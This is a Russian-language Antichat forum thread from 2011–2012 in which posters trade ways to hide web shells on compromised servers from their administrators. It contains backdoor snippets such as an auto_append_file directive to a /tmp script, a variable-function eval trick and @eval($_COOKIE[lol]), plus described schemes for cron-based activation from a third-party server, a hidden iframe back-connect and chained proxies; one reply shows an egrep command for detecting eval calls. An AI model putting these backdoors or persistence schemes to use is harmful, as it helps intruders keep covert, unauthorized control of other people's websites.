ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

01.11.2011, 03:22
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме: 1698585
Репутация:
818
|
|
Сообщение от None
Аппенд ко всем скриптам php_value auto_append_file "/tmp/httpconf.tmp"
Я заметил привычку прятать шеллы и прочие скрипты на сервере в папке /tmp/ Но видимо не все знают что содержимое папки /tmp/ живет до ребута, хоть сервера и редко ребутят, но все же.
|
|
|

01.11.2011, 18:16
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_1[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
s.php?_=eval&_1=phpinfo();
|
|
|

01.11.2011, 19:27
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от m0Hze
m0Hze said:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_1[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
s.php?_=eval&_1=phpinfo();
только при register globals on.
Даже если бы rg on был бы, то ничего не вышло бы, т.к. eval не функция, поэтому ее нельзя в переменную заложить, но я понимаю что это просто пример был, можно использовать другие варинаты, например прямая запись в файл.
|
|
|

12.11.2011, 17:12
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
Я бы подходил тоньше в данному вопросу. А именно - использование методик сокрытия доступа , как такового в зависимости от условий каждого конкретного случая. К примеру VPS с одним сайтом, сетевые правила разрешают входящие соединения без явных ограничений ( тупо не перекрываются коннекты на 33, 404, 31337 etc произвольные открытые несанкционировано порты). В крон вбивается скрипт физически размещаемый вне локаций имеющих отношение к веб сервисам. Каждые 10-15 мин он проверяет наличие активирующей команды на на стороннем сервере ( банально в том же .txt) , если TRUE -> биндится порт - благо если сервисами не забит порт 8080. А далее удаленно выполняется к примеру тот же PHP. Кому-то может показаться чрезмерно массивным и излишне сомнительным. На практике же ,все достаточно просто в реализации. Пользуюсь и , как показывает статистика, доступ к ресурсам живет дольше чем в варианте постояттного физического размещения шела в директории веб-сервера.
|
|
|

28.11.2011, 10:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 173402
Репутация:
37
|
|
У меня такая задумка:
В любом модуле,плагине вообщем в любой странице
сайта вставляем прозрачный или под цвет сайта
(главное чтоб его не видно было)
на пример 2х2 код iframe и чтобы он находился
где нибудь в углу, и при клике по нему делался
back-connect на любой порт, получаем консоль
чем не полноценный шелл.Так же можно релизовать
проксю заместо кода back-connecta ставим редирект
на другой сайт с таким же iframe и так далее
N'ое количество сайтов.Чем не цепочка прокси.
А для GUI'шников на последнем N'ом сайте можно и WSO
Пусть попробуют проследить.
|
|
|
|

30.11.2011, 14:12
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
2 vasykas:
Ты наверное не понял сути вопроса данного поста. Речь идет о том, как спрятать выполняемый код от администратора какого-либо ресурса, на котором необходимо разместить веб-шелл. Именно то, как спрятать вызываемый через iframe(как ты предлагаешь) код, именно и обсуждается в данном посте.
|
|
|

11.01.2012, 07:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Вот мой способ(можно в иднекс запихнуть например):
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Если кто-то сменить пароль/удалить все возвращается на место
UPD. Поправил.
|
|
|
|

11.01.2012, 16:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
Сообщение от Ereee
Ereee said:
Вот мой способ(можно в иднекс запихнуть например):
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Если кто-то сменить пароль/удалить все возвращается на место
А ничего что переменная $b - не установлена?
У тебя по сути всегда будет $a!=$b.
Да и потом, переедет сайт на новый сервер, а там allow_url_fopen=Off, вот понавылазиет им варнингов.
Если нато уже пошло, то уж куда лучше @eval($_COOKIE[lol]); оно и не так палится.
Да и вообще никакой логики, файл шелла проверяется обычный shell.php, а заливаешь ты уже куда-то в глубь.
|
|
|
|

11.01.2012, 16:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от Boolean
Boolean said:
А ничего что переменная $b - не установлена?
У тебя по сути всегда будет $a!=$b.
Да и потом, переедет сайт на новый сервер, а там allow_url_fopen=Off, вот понавылазиет им варнингов.
Если нато уже пошло, то уж куда лучше @eval($_COOKIE[lol]); оно и не так палится.
Да и вообще никакой логики, файл шелла проверяется обычный shell.php, а заливаешь ты уже куда-то в глубь.
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]egrep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]H[/COLOR][COLOR="#DD0000"]"eval\("[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]find . -type f -name "*.php" -print[/COLOR][COLOR="#007700"]`[/COLOR][/COLOR]
|
|
|
|

11.01.2012, 16:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
2Boolean,
sorry. Там не $b = md5_file($b); а $b = md5_file($fileb);
>У тебя по сути всегда будет $a!=$b.
С чего это вдруг?
2Expl0ited,
+1
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|